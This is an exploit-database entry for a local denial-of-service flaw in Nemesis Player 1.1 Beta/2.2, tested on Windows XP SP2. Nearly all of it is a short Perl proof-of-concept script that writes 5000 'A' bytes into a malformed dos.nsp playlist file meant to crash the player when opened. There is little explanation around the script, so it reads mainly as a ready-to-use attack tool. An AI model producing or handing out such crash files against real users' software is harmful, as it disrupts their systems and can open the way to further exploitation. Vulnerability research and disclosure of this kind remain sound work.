id: 10076
date: 01/13/2010
title: Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability
author: Rehan Ahmed
cves: 

================================================================
Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability
================================================================

#!/usr/bin/perl
#Exploit Title: Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability
#Author:Vulnerability Discovered By Rehan Ahmed 
#Vendor:http://www.nsplayer.org
#Version:1.1 Beta/2.2
#Tested On: WinXP SP2
 
my $boom="\x41" x 5000;
my $file="dos.nsp";
open($FILE,">$file");
print $FILE $boom;
close($FILE);
print "File Successfully Created\n";


#  0day.today [2023-03-22]  #